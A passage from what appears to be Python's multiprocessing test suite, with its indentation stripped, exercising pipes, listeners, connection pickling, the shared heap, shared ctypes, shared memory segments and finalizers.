if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((test.support.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
